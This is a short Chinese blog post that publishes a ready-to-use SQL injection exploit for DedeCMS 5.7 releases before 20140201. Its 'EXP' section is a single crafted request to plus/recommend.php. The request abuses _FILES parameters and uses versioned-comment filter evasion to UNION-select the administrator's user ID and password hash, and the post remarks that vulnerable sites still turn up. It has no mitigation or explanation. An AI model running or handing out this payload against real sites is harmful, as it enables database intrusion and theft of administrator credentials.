DYBOY's Blog

DedeCMS 20140201 之前的5.7通杀SQL注入漏洞

虽然漏洞有点久远了,但有的时候还能遇见…

虽然漏洞有点久远了,但有的时候还能遇见…

0x00 EXP

http://www.dyboy.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'or mid=@`\'`/*!50000union*//*!50000select*/1,2,3,(selectCONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111

0x01 成功案例

利用成功的截图如下
dedecms SQL注入

版权声明:《 DedeCMS 20140201 之前的5.7通杀SQL注入漏洞 》为DYBOY原创文章未经允许不得转载。

 DYBOY
 作者签名:安全从业者,爱好安全产品开发,渗透测试,Web漏洞研究

发表评论:

用心评论~

TOP
Powered by Emlog | Theme:Monkey by DYBOY
渝ICP备16008772号
sitemap